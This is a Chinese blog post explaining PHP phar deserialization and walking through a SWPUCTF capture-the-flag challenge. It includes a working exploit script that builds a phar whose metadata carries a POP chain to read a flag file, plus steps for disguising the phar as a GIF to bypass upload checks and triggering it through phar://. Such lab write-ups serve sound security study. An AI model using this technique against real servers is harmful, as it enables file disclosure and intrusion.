php序列化漏洞攻击实战,浅析phar反序列化漏洞攻击及实战

最新推荐文章于 2024-03-06 10:14:43 发布
最新推荐文章于 2024-03-06 10:14:43 发布
阅读量208 收藏 1
点赞数
文章标签: php序列化漏洞攻击实战

前言

phar反序列化漏洞很久之前就开始接触了;因为当时出了点问题导致一直无法成功,所以当时直接去学习其他的漏洞了;今天觉得是时候把这个漏洞补上去了;

漏洞成因

phar文件会以序列化的形式存储用户自定义的meta-data;该方法在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直接进行反序列化操作

原理分析

phar的组成

通过查阅手册发现phar由四部分组成;翻阅手册可以知道,phar由四个部分组成,分别是stub、manifest describing the contents、 the file contents、 [optional] a signature for verifying Phar integrity (phar file format only) 下面进行解释一下;

1 .0 a stub

标识作用,格式为xxx<?php xxx; __HALT_COMPILER();?>,前面任意,但是一定要以__HALT_COMPILER();?>结尾,否则php无法识别这是一个phar文件;

2 .0 a manifest describing the contents

其实可以理解为phar文件本质上是一中压缩文件,其中包含有压缩信息和权限,当然我们需要利用的序列化也在里面;

de8c786df57cb59ce3b2701a353721d2.png

图片选自于 seebug

3 .0 the file contents

这里指的是被压缩文件的内容;

4 .0 [optional] a signature for verifying Phar integrity (phar file format only)

签名,放在结尾;

试验

这里引用开心师傅给的一个实例;来进行生成;

class TestObject {

}

@unlink("phar.phar");

$phar = new Phar("phar.phar"); //后缀名必须为phar

$phar->startBuffering();

$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$o = new TestObject();

$phar->setMetadata($o); //将自定义的meta-data存入manifest

$phar->addFromString("test.txt", "test"); //添加要压缩的文件

//签名自动计算

$phar->stopBuffering();

?>

然后在服务器之下运行,发现成功生成phar文件;

5a99b1a07d42da7bbfd32d24d7f05275.png

然后打开这个phar文件,我们发现已经成功;并且数据的存储方式是以序列化的方式存储的;

将phar伪造为其他类型的文件

前面在讲的时候已经介绍了phar的四个部分,这里注意到第一个部分stub;因为这个部分的存在,纵然我们修改了phar后缀,服务器读取到stub的时候依然会当作phar文件;再准确点讲就是下面的代码;(二进制的编译器有点问题,简单用记事本来看看;)也还是可以发现是以序列化形式存储的;

实战

拿一道 SWPUCTF 中的一道题目来讲;进去就发现了包含漏洞,然后直接读取源码,发现并没有对phar进行过滤;而且源代码里有提示,所以差不多实锤了,就是phar反序列化漏洞了;

直接来对关键的代码进行分析;class.php

这里面看到有三个类,再明显不过了,这就是主要的pop链的构造处;然后发现了危险的函数 file_get_contents();那看来就是利用这个读源码了;

f679eca44ea5cf8c10c8b93c750ac694.png

一步步分析;先看到C1e4r这个类里面有echo;那要利用echo;以达到输出字符串的目的;

83b200c2dc8ff78a56ed27d2de6d4d4e.png

然后看到show类里有一个 __toString()方法,这个方法在对象被转化为字符串的时候会自动调用;比如进行echo print的时候会进行调用并返回一个字符串;

630884f7f9e4fbbc6ab1a9c0fafd9764.png

然后审计Test类,发现file_get_contents()函数,那就是利用了;一步一步向前追溯 file_get->get->__get();这里主要还是调用__get()方法;

那么这里思路差不多清晰了;简单来讲;在test类中要调用__get方法,那么触发这个方法我们需要在show类里寻,因为这个类里面运用了source属性,所以只需要将 str['str'] 赋值为 Test类就可以,那么触发 __toString()方法就需要用到我们的第一个类里面的echo了;

那么思路清晰就构造处pop链;

exp编写

<?php class C1e4r { public $test; public $str; } class Show { public $source; public $str; } class Test { public $file; public $params; } $c1e4r = new C1e4r(); $show = new Show(); $test = new Test(); $test->params['source'] = "/var/www/html/f1ag.php"; $c1e4r->str = $show; $show->str['str'] = $test; $phar = new Phar("exp.phar"); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ? >'); $phar->setMetadata($c1e4r); $phar->addFromString("exp.txt", "test"); $phar->stopBuffering(); ?>

生成phar文件,改后缀为gif绕过限制,上传之后进入upload目录之下(或者根据源代码算出上传后的文件名),复制文件名到读取文件的窗口读取 file=phar://xxxxxx.jpg然后得到base64的编码解码就好;

子维酱
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反序列化漏洞-02】PHP反序列化漏洞实验详解
cc
03-02 2776
序列化:程序将对象状态转换为可存储或传输的字节序列的过程(即对象状态转换为可存储或者可传输的过程){序列化是对象转换为字符串的过程}反序列化:程序把存储或传输的字节序列恢复为对象的过程。{反序列化则是字符串转化为对象的过程}如果字符串客户端可控,就会造成web应用反序列化任意对象,严重的是在反序列化的过程中会触发一些可以执行的php代码,例如phpinfoPHP中的序列化反序列化,基本都是围绕和两个函数展开的。在介绍这两个函数之前,我们可以先看一个简单的例子。
实战经验丨PHP反序列化漏洞总结
dfdhxb995397的博客
03-06 320
又到了金三银四跳槽季,很多小伙伴都开始为面试做准备,今天小编就给大家分享一个网安常见的面试问题:PHP反序列化漏洞。 虽然PHP反序列化漏洞利用的条件比较苛刻,但是一旦被利用就会产生很严重的后果,所以很多公司都比较关注这个技能点,小伙伴们一定要掌握哦。 PHP序列化反序列化介绍 什么是序列化反序列化 维基百科中这样定义:序列化(serialization)在计算机科学的数据处...
PHP漏洞全解
weixin_34090562的博客
05-29 73
针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injection) 6、跨网站请求伪造攻击(Cross Site Request ...
php phar 反序列化,利用 phar 拓展 php 反序列化漏洞攻击
weixin_39777018的博客
03-20 245
作者:seaii@知道创宇404实验室时间:2018/08/230x01 前言通常我们在利用反序列化漏洞的时候,只能将序列化后的字符串传入unserialize(),随着代码安全性越来越高,利用难度也越来越大。但在不久前的Black Hat上,安全研究员Sam Thomas分享了议题It’s a PHP unserialization vulnerability Jim, but not as w...
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
详解使用php-cs-fixer格式化代码
12-16
$ wget https://cs.symfony.com/download/php-cs-fixer-v2.phar -O php-cs-fixer $ chmod +x php-cs-fixer 2. 配置到PhpStorm ps:使用php-cs-fixer格式化你的代码 在开发中,我们会有意识的遵行一套规范来保证团队...
KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化)1
08-03
为了利用这个反序列化漏洞攻击者首先需要能够上传Phar文件。尽管系统对上传的文件类型和大小进行了检查,但添加`GIF89a`头可以使Phar文件伪装成图片,从而绕过验证。一旦Phar文件成功上传,攻击者可以利用`...
泛微E-Office10远程代码执行漏洞
最新发布
05-06
攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。成功利用这一漏洞攻击者可以执行服务器上的任意代码,从而获得服务器的控制权限。在最糟糕的情况下,这...
php漏洞攻击,PHP常见漏洞攻击原因分析
weixin_33828635的博客
03-18 515
下面是一个很明显的例子:<In main.php:程序代码以下为引用的内容:<?php$libDir = "/libdir";$langDir = "$libdir/languages";...include("$libdir/loadlanguage.php":?>In libdir/loadlanguage.php:<?php...include("$langDir/$userLang"...
PHP程序常见漏洞攻击宝典
12-13
PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型也不需要指定,它们会根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法。很显然,这也是快速开发语言的一个很有用的特点。一旦一个变量被创建了,就可以在程序中的任何地方使用。这个特点导致的结果就是程序员很少初始化变量,毕竟,当它们第一次创建时,他们是空的。
PHP程序的常见漏洞攻击分析
weixin_45486362的博客
06-26 156
PHP程序的常见漏洞攻击分析 不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。在节,我们将从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。 如何通过全局变量进行攻击PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法。一旦一个变量被创建了,就可以在程序中的任何地方使用。这个特点导致
php反序列化拓展攻击详解
BerL1n
01-27 845
2019-11-11 16:51 文章首发于先知社区:https://xz.aliyun.com/t/6699 前言 继上篇对thinkphp5版本反序列化pop链详细分析后,对tp的反序列化漏洞有了初步了解,但是其实无论挖掘的pop链有多么的完美,最终还是避免不了要有关键的触发点,否则将一无是处,比如常见的就是反序列化函数 unserialize() ,绝大多数都是靠unserialize函数,反序列化对象触发漏洞。但是在tp框架或者其他框架以及后期开发越来越安全的情况下我们很难再找到这样的触发点。最近也
php归档格式:phar文件详解(创建、使用、解包还原提取)
热门推荐
云客的技术博客【云游天下 做客四方】
02-10 1万+
一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHP 的 Web 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建或使用,
php(phar)反序列化漏洞及各种绕过姿势
MrWangisgoodboy的博客
04-14 4900
概念:序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简单来说就是我在一个地方构造了一个类,但我要在另一个地方去使用它,那怎么传过去呢?于是就想到了序列化这种东西,将对象先序列化为一个字符串(数据),后续需要使用的时候再进行反序列化即可得到要使用的对象,十分方便。来看看怎么说:所有php里面的值都可以使用函数来返回一个包含字节流的字符串来表示。函数能够重新把字符串变回php原来的值。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。
php伪协议漏洞_浅析phar反序列化漏洞攻击实战
weixin_39785150的博客
12-10 635
浅析phar反序列漏洞攻击实战前言phar反序列化漏洞很久之前就开始接触了;因为当时出了点问题导致一直无法成功,所以当时直接去学习其他的漏洞了;今天觉得是时候把这个漏洞补上去了;漏洞成因phar文件会以序列化的形式存储用户自定义的meta-data;该方法在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unse...
由浅入深剖析序列化攻击(一)
systemino的博客
05-06 616
前言 近期因为内部培训有序列化的需求,于是趁此机会由浅入深的剖析一下序列化相关内容。 之前也写过由浅入深的xml漏洞系列,欢迎阅读: https://skysec.top/2018/08/17/浅析xml及其安全问题/ https://skysec.top/2018/08/18/浅析xml之xinclude-xslt/ 序列化的概念 简单概括来说,序列化即保存对象在内存中的状态,也可以...
攻防世界:反序列化 Web_php_unserialize
zxnimud5的专栏
09-14 499
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
php常见的45个漏洞及解决方案
qqrrjj2011的博客
03-06 2238
php常见45个漏洞及解决方案
php反序列化漏洞习题
09-06
其中,SESSION反序列化漏洞涉及到不同处理器的不同储存格式,而phar反序列化漏洞需要了解phar的构造和使用条件。 通过这些习题的学习,可以更好地理解PHP反序列化漏洞以及如何进行防范和修复。<span class="em">1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值